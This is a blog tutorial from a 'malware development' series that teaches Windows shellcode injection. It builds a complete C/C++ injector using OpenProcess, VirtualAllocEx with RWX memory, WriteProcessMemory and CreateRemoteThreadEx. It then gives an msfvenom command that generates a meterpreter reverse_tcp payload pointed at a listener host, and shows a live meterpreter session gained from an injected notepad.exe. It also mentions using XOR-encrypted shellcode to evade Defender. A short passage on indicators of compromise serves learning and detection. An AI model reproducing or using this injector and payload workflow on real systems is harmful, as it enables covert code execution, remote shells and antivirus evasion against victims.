Page cover

Shellcode Injection

June 4th, 2023

Table of Contents

Foreword

Pork is airborne and hell hath frozen over, the second installment of our malware development series is out! In it, we learn about shellcode injection, and as a little bonus, DLL Injection as well.

Malware Development II: Process Injection

Overview

This technique is as vanilla as it gets. It is by far, , but it’s also quite elegant, don’t get me wrong. The general steps for a shellcode injection, are the following:

  1. Get a handle on a process by attaching to, or creating one.

  2. Allocate a buffer in the process memory with the necessary permissions.

  3. Write the contents of your shellcode to that buffer in the process memory.

  4. Create a thread that will run what you've surgically allocated and written into the process!

For this technique, we're sticking with the Win32 API, which at this point, you should be at least a little familiar with. If not, fret not. See the post below to get started:

Start here

Eventually, we'll get a bit more advanced in our craft but until then, we'll stick to using Win32 API. Just for now. Let's get started! We'll start by looking at which API calls we'll need to rip and tear into this technique... until it is done.

The API Calls

All of the documentation for these functions, as well as the entirety of Win32 API, can be found on Microsoft's own documentation pages (commonly referred to as the "MSDN"). Remember that Win32 API, is well-documented, meaning that if you have questions about what something is doing within a function or program, more times than not, you'll be able to find the answer within the docs itself.

On the flip side, I know how daunting this incredible resource is when you first start. However, I promise that if you take the time to actually read it, you'll really come to appreciate this resource.

The most common calls you might end up seeing for this technique are something like the following (in their respective order):

/* get a handle on the process */
HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

/* allocate some space in the process memory */
LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

/* write the contents of our payload into the buffer from the previous step */
BOOL WriteProcessMemory(
  [in]  HANDLE  hProcess,
  [in]  LPVOID  lpBaseAddress,
  [in]  LPCVOID lpBuffer,
  [in]  SIZE_T  nSize,
  [out] SIZE_T  *lpNumberOfBytesWritten
);

/* create a thread to run our payload */
HANDLE CreateRemoteThreadEx(
  [in]            HANDLE                       hProcess,
  [in, optional]  LPSECURITY_ATTRIBUTES        lpThreadAttributes,
  [in]            SIZE_T                       dwStackSize,
  [in]            LPTHREAD_START_ROUTINE       lpStartAddress,
  [in, optional]  LPVOID                       lpParameter,
  [in]            DWORD                        dwCreationFlags,
  [in, optional]  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList,
  [out, optional] LPDWORD                      lpThreadId
);

Creating the Program

Again, all of this probably looks really alien if you're just starting out, but worry not, I'll be holding your hand for the setup of this program. It's at this point I'd like to discuss the different kinds of compilers, IDEs, and all of that. I'm going to be programming in Visual Studio; I'll also just be using the MSVC compiler to compile my program.

Whichever IDE you use, shouldn't matter in the slightest. However, the way you compile this program definitely does. We'll get more in-depth into why it's important in the "Common Pitfalls" section. For now, just follow my lead. We start by making a new project in Visual Studio, and then you can create a C, C++ file. I'll make a file called crowinject.cpp, which will house the following contents for now:

In the video, I made a C++ file, but funnily enough, I only ever make C++ files just to fill them with a majority of standard C code. So, soon I'll be using more and more actual C++ in the next blogs. Also, during the time rewriting this blog, I've also learned some new "best"-practices, and as such, I'll be making my code reflect that. Moreover, the code in the video, and the code from this blog will look a bit different now but you'll live.

#include <windows.h>
#include <stdio.h>
 
/* wake up samurai, we've got status symbols to setup 
(as we get more advanced, we'll start incorporating macros instead) */
const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]){
    printf("%s everything's in order", k);
    return EXIT_SUCCESS; 
}

Here, we're including the Windows header (<windows.h>) into our program, which will let us use the Win32 API. Which, if we remember, is just an interface that allows us to talk to the OS. I started using because I really like making my code verbose. Perhaps more verbose than it should be. They're both defined in the <stdlib.h> library and it's just a glorified way of saying 0 for success, 1 for error.

Read more here

Let's compile this, just to make sure everything's working.

After compiling the program, we can run it from the command line, or we could've just pressed Ctrl+F5 to start without debugging, which automatically compiles and runs your program. So, after doing that, we get our expected output:

Working as intended™ (you can click on the image to make it bigger)

In the video, I defined the variables (like hProcess, hThread, PID, etc.) in the global scope. This is actually not good practice as I've learned; it's better to have the variables defined in the function scope otherwise it'll come back and haunt us in the future. Also, in the video, I had mentioned the Hungarian notation that Microsoft uses for its' naming convention; but some of my variables weren't following the naming convention, while others were.

So, I'll try to omit this cherry-picking and just follow the Hungarian naming convention a bit more strictly from now on. We'll make sure that the program was supplied with an argument for the PID, if not, we'll have it error out with the usage:

#include <windows.h>
#include <stdio.h>

const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]) {

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = NULL, dwTID = NULL;
    HANDLE hProcess = NULL, hThread = NULL;

    if (argc < 2) {
        printf("%s usage: %s <PID>", e, argv[0]);
        return EXIT_FAILURE;
    }

    dwPID = atoi(argv[1]);

    printf("%s trying to get a handle to the process (%ld)\n", i, dwPID);

    /* try to get a handle on the process now */

    return EXIT_SUCCESS;
    
}

We see some familiar data types and variables (assuming you've gone through the first video). We see some HANDLE types which we've assigned to the hProcess and hThread variables. We've created some DWORD types which we've assigned to the PID and TID variables. We'll come back to the rBuffer in a bit, but let's continue for now. We're checking to see if the program has been supplied with an argument for the PID to attach to.

If we don't take in a PID from the CLI, we'd have to change it in the source code every single time and recompile it over and over again. And frankly, I can't think of a better example of unhinged masochism. After we get an argument for the PID, we convert it into an integer type since PIDs are numbers. Moreover, on Windows, PIDs are always multiples of four (4). Not important here, but still pretty cool to know. At this point in our code, we're going to try to get a handle on our target process.

Getting a Handle

As you may know by now, we're going to be using the OpenProcess function to get a handle on our process.

OpenProcess syntax from MSDN

The easiest way to grasp what this function does is by reading the "Return value" section of this function. You can find it below:

Return value section of OpenProcess
OpenProcess return value

From this section, we can see that if OpenProcess succeeds, it will return an open handle to the specified process, which is what we're going to make our hProcess variable hold; hence why it was important to declare it as the HANDLE data type. If it fails, it will return NULL. Because of this, we can set up some pretty cool error handling for our program as we'll see soon. Let's look at the arguments this function expects:

  1. DWORD dwDesiredAccess

  2. BOOL bInheritHandle

  3. DWORD dwProcessId

The first argument is where we specify the access rights we'd like to have on the target process. There are various access rights that we could specify, which we can see below:

Process-specific access rights table from MSDN

You can read more about them here:

Process access rights table

I'll still try my best to explain what these are and why we need them, so don't worry. Basically, these process access rights determine what exactly we're allowed to do to a process. Remember the steps of this technique and how I said we'd have to allocate and write some memory within the processes' memory? For us to be able to even do that, we'd at minimum need:

PROCESS_VM_OPERATION access right from the aformentioned table

As you can see, because we're trying to tinker with the address space of the process, using functions like VirtualProtectEx and WriteProcessMemory, we'd have to supply this access right. Is that it then? Is that all we supply in this argument? PROCESS_VM_OPERATION? Well... not quite. You see, these rights are extremely particular. Sure, you'll be able to allocate and write to the process memory, but how do you expect to create a thread to run your payload without an access right like:

PROCESS_CREATE_THREAD access right

Not to mention other rights like being able to query information about the process (PROCESS_QUERY_INFORMATION), suspending or resuming it (PROCESS_SUSPEND_RESUME), etc. It's because of all of these little things and rights, it's easier for us to just specify an access right like PROCESS_ALL_ACCESS.

Although, note that it's generally best practice to give yourself the least amount of rights in order to do something. It's also safer that way and generally regarded as the best practice for dealing with things including rights and privileges. Since what we're trying to do is quite beefy and requires various different little access rights, we'll just supply PROCESS_ALL_ACCESS as our argument here to avoid that headache.

hProcess = OpenProcess(PROCESS_ALL_ACCESS, ...) 

Now, let's get on with that second parameter, bInheritHandle. This parameter is just a boolean that specifies whether we'd like to inherit the handles created by our process; i.e., if our process creates another process, do we want to inherit that handle of the newly created process? We'll set this to FALSE, since we don't really care about this right now:

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ...) 

Lastly, the dwProcessId argument is the PID of the process we'd like to open a handle to. We've already created this variable so let's just supply it here:

hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); 

Et voila! We've set up this portion of the code and we can now work on some error handling, as mentioned before! Since we know that this function returns NULL on error, we can write the following:

Error handling for our process handle

Retrieving Error Codes

I've also introduced a new function here, GetLastError. One of my favourites. It's so simple but it provides so much information. Let's try an example (if you don't care, or already know what this function does, click here to move to the next portion). The GetLastError function is defined thusly:

GetLastError syntax from MSDN
Return value of GetLastError

We can see that if a thread errors out, this function grabs the error code corresponding to that specific error. Let's try to supply a PID to our program which obviously wouldn't ever exist and see what this program spits out.

Error output

We can see that the program spits out an error with the following value: 0x57. "What the hell does this mean? What do we do with this?" I may hear you ask. This value or any of the values outputted here, are system error codes. Furthermore, from the following page:

Catalogue of various system error codes
Holy moly

We can see that there are a ton of these. What we'd do now, is just cross-reference the error code we got, with this neat little section and we can quickly figure out what went wrong based on the error code! Let's take that 0x57 value from our program and see what's going on.

ERROR_INVALID_PARAMETER error code

We can see that our value of 0x57 is telling us that we've supplied an invalid parameter! That's so much information given to us! Now, you can also print this out as a decimal by changing the format specifier to %ld. I personally like the way that hexadecimal looks a bit more, but again, all up to you. Let's try one more example, where we try to get a handle on an elevated process. Something like the system process with PID 4:

System error code of 0x5

We get an error code of 0x5. If we look this up in the error code catalogue, we can see that this tells us we don't have the necessary permissions in order to open a handle to this process:

ERROR_ACCESS_DENIED error code

Cool! You now know what these error codes are and how to help yourself debug much easier.

Allocating a Buffer

Here's where we're at right now:

Recieved a valid handle to target process

We can see that if we supply a legitimate PID to an actual process, the program spits out the handle we got from it. Now, we need to allocate a region of memory to our target process, and we can do this with the ever-so-popular, VirtualAllocEx function. Before doing that, we need to set up some variables since VirtualAllocEx will be expecting them.

(snip...)

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = NULL, dwTID = NULL;
    HANDLE hProcess = NULL, hThread = NULL;
    
    unsigned char crowPuke[] = "\x41\x41\x41\x41\x41\x41";
    size_t crowPukeSize = sizeof(crowPuke);

(snip...)

We're setting up our shellcode here, as well as the size of it. If we try to inject this into our process, it will kill it. This isn't valid shellcode, and wouldn't do anything - and as such, the process will crash. We'll come back to creating the shellcode when the time comes, but for now, let's start setting up VirtualAllocEx.

VirtualAllocEx syntax from MSDN

The first parameter is a handle to our process. Our hProcess variable is currently holding the return value from OpenProcess, which again, is just an open handle to our target process. So, we can just put in hProcess for this argument.

rBuffer = VirtualAllocEx(hProcess, ...)

The second parameter, i.e., the lpAddress is an optionally-inputted argument for this function. It's just a pointer that specifies the starting address for the region of pages that we'd like to allocate. If we set this to NULL, the function will determine where to allocate the region. Therefore, we'll let the function drive itself home for this part.

rBuffer = VirtualAllocEx(hProcess, NULL, ...)

The next argument, dwSize, is where we specify the size of the region of memory that we'd wish to allocate. This is the size of our shellcode from earlier. So, let's populate this argument as such:

rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, ...)

Next up, we have the flAllocationType. This is the type of allocation we'd like to do.

Allocation types

For our cases here, we just want to be able to reserve some space (MEM_RESERVE) and then we'd want to be able to actually commit that memory (MEM_COMMIT). So, let's add them both.

rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), ...)

Last but not least, we have to select the memory protection that we want our allocated memory to have. From the documentation:

flProtect section of VirtualAllocEx from MSDN

So, we're allowed to specify any one of the memory protection constants, huh? Let's go give them a visit and see what we're allowed to supply here 😄. You can find these memory protection constants below:

Memory Protection Constants
Some of the memory protection constants for us to use

As is the case with most of Microsoft's stuff, there are a lot of things for us to choose from here. However, we need to remember the basics. We're going to be giving ourselves PAGE_EXECUTE_READWRITE (RWX) for our shellcode. If we don't have the execute permissions, it's like the whole nightmare of dealing with NX/DEP. Our shellcode won't be of any use to us if we can't execute it.

Remember that a random buffer which is randomly allocated to your process memory with full RWX permissions can look extremely suspicious. There are some techniques in which a function like VirtualProtect gets used. With VirtualProtect, what would happen is something like the following: You allocate a region of memory with minimal permissions initially (something like RW), and then change those permissions (to something like RX) denoted by the flNewProtect argument supplied to this function.

[in] flNewProtect

The memory protection option. This parameter can be one of the memory protection constants.

For mapped views, this value must be compatible with the access protection specified when the view was mapped (see MapViewOfFile, MapViewOfFileEx, and MapViewOfFileExNuma).
rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); /* horrible permissions, ik - better off making this rw -> virtualprotect() -> rx */

With that done, we've allocated our buffer at this point! This means we're now ready to actually write the contents of our shellcode, into our recently allocated buffer inside of the process memory.

Writing to Process Memory

Here's where we're at right now:

#include <windows.h>
#include <stdio.h>

const char* k = "[+]";
const char* e = "[-]";
const char* i = "[*]";

int main(int argc, char* argv[]) {

    /* declare and initialize some vars for later use */
    PVOID rBuffer = NULL;
    DWORD dwPID = NULL, dwTID = NULL;
    HANDLE hProcess = NULL, hThread = NULL;
    
    unsigned char crowPuke[] = "\x41\x41\x41\x41\x41\x41";
    size_t crowPukeSize = sizeof(crowPuke);
            
    if (argc < 2) {
        printf("%s usage: %s <PID>", e, argv[0]);
        return EXIT_FAILURE;
    }

    dwPID = atoi(argv[1]);

    printf("%s trying to get a handle to the process (%ld)\n", i, dwPID);

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID); 

    if (hProcess == NULL) {
        printf("%s failed to get a handle to the process, error: 0x%lx", e, GetLastError());
        return EXIT_FAILURE;
    }

    printf("%s got a handle to the process\n\\---0x%p\n", k, hProcess);

    rBuffer = VirtualAllocEx(hProcess, NULL, crowPukeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    printf("%s allocated %zd-bytes to the process memory w/ PAGE_EXECUTE_READWRITE permissions\n", k, crowPukeSize);

    /* write shellcode contents to the allocated buffer */

    return EXIT_SUCCESS;

}

Let's try running this just to make sure we're getting the expected output.

Lookin' good, shawty

Nice. Now we can finally write the contents of our shellcode into this recently created buffer. In order to do that, we utilize the WriteProcessMemory function.

WriteProcessMemory syntax from MSDN

The first parameter is the handle to our process,hProcess.

WriteProcessMemory(hProcess, ...)

This second parameter (lpBaseAddress) is the rBuffer that we've created and allocated to the process memory. As we can see from the documentation:

lpBaseAddress parameter
WriteProcessMemory(hProcess, rBuffer, ...)

The lpBuffer is the next parameter. This is where we specify the actual contents of our shellcode. Earlier, you heard me say that the shellcode we have currently, would shred our process memory and cause it to crash. Well... why hasn't that happened yet? It's because VirtualAllocEx isn't the same thing as writing the contents of your payload into the memory. This is why we're able to allocate this memory without our program crashing.

For those who are new, a tip to help you think about VirtualAllocEx and WriteProcessMemory would be like the following:

Think of the buffer that you create with VirtualAllocEx as a canvas. You defined how big it is, what permissions it has, the memory allocation type, etc. Then, you can think of WriteProcessMemory as the step in which you actually write whatever (or paint whatever in this analogy) to that allocated buffer.

WriteProcessMemory(hProcess, rBuffer, crowPuke, ...)

The nSize argument is the size of our shellcode, which we've already defined as crowPukeSize (so sorry for these naming conventions):

WriteProcessMemory(hProcess, rBuffer, crowPuke, crowPukeSize, ...)

And lastly, we have an outputted parameter called lpNumberOfBytesWritten. This just stores the number of bytes we've written in the memory region. You can choose to add this if you want, we'll just set it to NULL, which will just cause the parameter to be ignored.

WriteProcessMemory(hProcess, rBuffer, crowPuke, crowPukeSize, NULL);

And just like that, we've set up the WriteProcessMemory function. Let's add in a quick little print statement indicating such.

Almost there!

And now, if we try to run this, we can see the following output:

Current program output

All that's left for us is to create a thread to run our payload!

Creating a Thread

In this section, we're going to be creating a thread with the CreateRemoteThreadEx function. If we take a look at the return value of this function, we can see that it's practically the same thing as our OpenProcess function; except in this case, we're dealing with threads.

Return value of CreateRemoteThreadEx

Because we know that this function returns a handle to the new thread, we'll make our hThread variable hold this return value:

hThread = CreateRemoteThreadEx()

Let's look at the syntax for this function.

CreateRemoteThreadEx syntax from MSDN

Now, I know. There are like 12 duovigintillion parameters for this function. However, fret not - most of them are going to be zero (0) or NULL. We know the drill by now, we'll fill out what we know, and then consult the documentation for what we don't know.

hThread = CreateRemoteThreadEx(hProcess, ...)

The lpThreadAttributes, as we can see from the documentation, is just a pointer to the SECURITY_ATTRIBUTES structure. This is just to specify a security descriptor for the new thread; also determines if child processes can inherit the returned handle. If we set this to NULL, the thread will get a default SD (security descriptor) and the handle cannot be inherited.

Documentation for the lpThreadAttributes parameter
hThread = CreateRemoteThreadEx(hProcess, NULL, ...)

For the dwStackSize argument, we can set it to 0 to let the thread use a default stack size for the executable.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, ...)

This next section is going to take a bit to explain, but it's pretty cool, nonetheless. So, I'll write out the code here, and then we can explain what's going on here.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, ...)

Okay, just relax. I know your heart rate just quadrupled, and you can practically ski on the clumps of hair you've pulled out of your scalp from seeing this random line of code seemingly come from nowhere, but just relax. We'll figure this out. So, firstly, let's discuss the parameter itself, before delving into what we're supplying as an argument. Let's consult the documentation.

lpStartAddress parameter documentation

This parameter is where we specify a pointer to the starting address of what we'd wish to run. We want execution to begin at the buffer that we've created, which at this point, would've had the contents of our shellcode written into it, and we typecast this buffer to the LPTHREAD_START_ROUTINE to match the signature of this parameter. For the next parameter (lpParameter), we can just set it to NULL since we don't have any variables that we're passing to the thread function (lpStartAddress).

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, ...)

The next section is the creation flags we'd wish to specify for our thread. dwCreationFlags could be any of these values:

dwCreationFlags values

We see that if we supply 0 here, the thread will run immediately after creation. The CREATE_SUSPENDED flag could also be a cool thing to mess around with, but that's left as an exercise for the reader. We'll supply 0 here since we want our thread to run immediately.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, ...)

We only have 2 arguments left to supply, we're almost there! The second last parameter of this function, lpAttributeList contains additional parameters for the new thread. We don't really care about this for now, so we can just set this to zero (0):

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, ...)

And lastly, the final parameter (lpThreadId) is where we can set a pointer to the variable that will receive the thread ID (TID) of the newly created thread. So, let's set this to the dwTID variable we created when we defined dwPID.

hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &dwTID);

So, at this point, we could run our program, and we'll see that the program will inject into our target process, but because of the fact that we're using gibberish as shellcode, the program crashes:

Invalid shellcode demo

So, what we'll do here - is firstly, add in some more debugging lines for verbosity. Secondly, we'll generate some valid shellcode from msfvenom and try to perform the injection, for real.

(snip ...)

    /* create a thread to run our payload */
    hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &dwTID);
    
    if (hThread == NULL) {
        printf("%s failed to get a handle to the new thread, error: %ld", e, GetLastError());
        return EXIT_FAILURE;
    }
    
    printf("%s got a handle to the newly-created thread (%ld)\n\\---0x%p\n", k, dwTID, hProcess);

    printf("%s waiting for thread to finish executing\n", i);
    WaitForSingleObject(hThread, INFINITE);
    printf("%s thread finished executing, cleaning up\n", k);

    CloseHandle(hThread);
    CloseHandle(hProcess);
    printf("%s finished, see you next time :>", k);

    return EXIT_SUCCESS;

}

The WaitForSingleObject and CloseHandle functions are also going to be left as an exercise for you to learn about. It will be really fun for you to seek out what these functions do and learn about them, they're pretty straightforward from the name, but regardless, for these two functions; you're on your own 😉

Generating Shellcode

I'll be using my Kali machine to generate the shellcode, literally doesn't matter what OS you use; we're only interested in one tool for now, msfvenom. You could create your own if you want. PIC shellcode has been pretty huge recently, but we're going to take the easy route for now, and just generate our own.

I did say I was going to generate calc.exe shellcode for our injections, but since this is our first time, let's live a little, eh? I'll run the following command:

cr0w@blackbird: ~
ζ ›› msfvenom --platform windows --arch x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=443 -f c --var-name=crowPuke
Shellcode generation with msfvenom

For the 100th time, remember to make the architecture of your shellcode match the architecture of your injection program. So, let's fix up our injection program with this as our payload, and after that, we'll set up the multi/handler listener needed to catch the callback for this reverse shell.

Setting up multi/handler

Now, we're all set to execute our program.

Performing the Injection

We recompile the program, and after specifying a valid PID to our injector, we can see the results:

Mission accomplished!

Furthermore, if we close the meterpreter session:

meterpreter > getuid
Server username: BAT-COMPUTER\Bruce
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.198.130 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/handler) >

We can see that the WaitForSingleObject function we were using, successfully notes that our thread has finished executing!

Beautiful

Because we've got a reverse shell from our notepad.exe process, we'll see in the Modules tab within this amazing tool, Process Hacker 2:

Process Hacker 2 Download

There's an entry of some "networking"-related stuff in this process; which under normal circumstances, it would never do. This would be an insanely suspicious IOC (Indicator of Compromise), since why would Notepad ever need something like sockets or things to do with networking in it? If we look at the "Threads" tab within Process Hacker, we can see our newly created thread in the list:

Thread ID found in Process Hacker

If we double-click on the one in Process Hacker, we can see some peculiar stuff on the thread stack:

Thread stack showing presence of ws2_32.dll

Or, better yet, in the "Modules" section of the program, we can see this ws2_32.dll and mswsock.dll loaded into the modules:

ws2_32.dll module loaded into process

Now, what would a socket library be doing in our humble Notepad process? You can see this mentioned in one of the holiest resources for malware development:

Addressing the ws2_32.dll and shellcode injection

And there you go! You've come such a long way and you've learned so much! Seriously, you should be proud of yourself for making it this far. We'll now discuss some common pitfalls that can prohibit you from emulating this attack. You can find the source code of this program attached below, or on the GitHub repository that'll house all the code that we end up making in these blogs/videos.

Shellcode Injection source code

Common Pitfalls

A crazed lunatic once messaged me; the message showed her following along with this guide and performing her own shellcode injection. "Yippie!", I thought to myself. But alas, the message continued, and with it, my plight:

User obfuscated to spare you guys the sanity drain

"Strange..." I pondered the state of her process's memory, which looked like it had been injected with the generated payload:

Executing the injection, no process spawns

A million different scenarios went through my head. "Could it be Defender?", "Could it be the payload?", "Could it be something to do with the build/version of Windows?", "Could it be the program itself?", etc. It turns out that she was using the same build of windows as me, so that's out of the question.

Her winver output

And even so, we're using higher-level API so the build and version shouldn't even matter. The source code wasn't the issue either since at one point she'd tried some code that I knew would work (super simple XOR encryption to bypass Defender). I gave her some code that had XOR-encrypted shellcode - since I wanted to test to see if it was an issue with Defender as well. Turns out, nope. Window's Defender wasn't even triggered during the compilation of the program, so that's out the window.

Moreover, even with the XOR-encrypted shellcode, after the injection was run, there still wasn't a new process to show for it. So, eventually, we took a break. Then, at the time of writing this blog post, April 30th, 2023, I got yet another message about someone facing a similar issue. Their program, just for the life of them, would not spawn a new process; even though it seemingly did inject it into the target process's memory.

Another similar issue arose

The user had told us that they were compiling with gcc like this:

gcc shellcodeinjection.cpp -o shellcodeinjection.exe

And because of this, I thought that maybe they were using wide API functions, i.e., SomeFunctionW() but failing to include the -municode flag for compilation. So, after consulting some amazing, amazing friends of mine, the culprit of architecture was brought to light.

Resolution speed-run. Also, hello k4ngar00: )

It was at this very moment that my eyes opened up wider than they ever have. I could see individual fermions whizzing past my eyes, I could grab clouds, I could smell numbers, taste vision, etc. How could we forget this? It was so painfully obvious, you must compile your program for the architecture that you wish to target; and with this, your shellcode must follow the same harmony. Remember that x86 shellcode != x86_64 shellcode. You also can't have your 32-bit program injecting into a 64-bit process. Anyways, we sent our newly-crested warrior out to compile their program as a 64-bit program and we patiently awaited their response.

Mission accomplished.

Perfection. We had finally conquered the bug that plagued us for so long, with nary a trail for us to even follow it. Congratulations, l0n31yMC. May the offensive security gods bless you on the rest of your trek.

TL;DR

Acknowledgements

Thank you to the amazingly beautiful wizards, @bakki and aqua for helping debug this stupidly simple oversight. I love you guys. And remember guys, sometimes, the solution is far simpler than you think it is. See you in the next section. Also, thank you to everyone who's given me constructive criticism of the site as a whole, the code, the videos, etc.

Again, at the time of rewriting this blog, June, 4th, 2023, it's only been about 3 months since I started my malware development journey. Therefore, there's obviously still an incredible amount of stuff that I don't know. , I appreciate all of you for being patient with my ignorance and teaching me new things to become better and better.

References

Last updated

Was this helpful?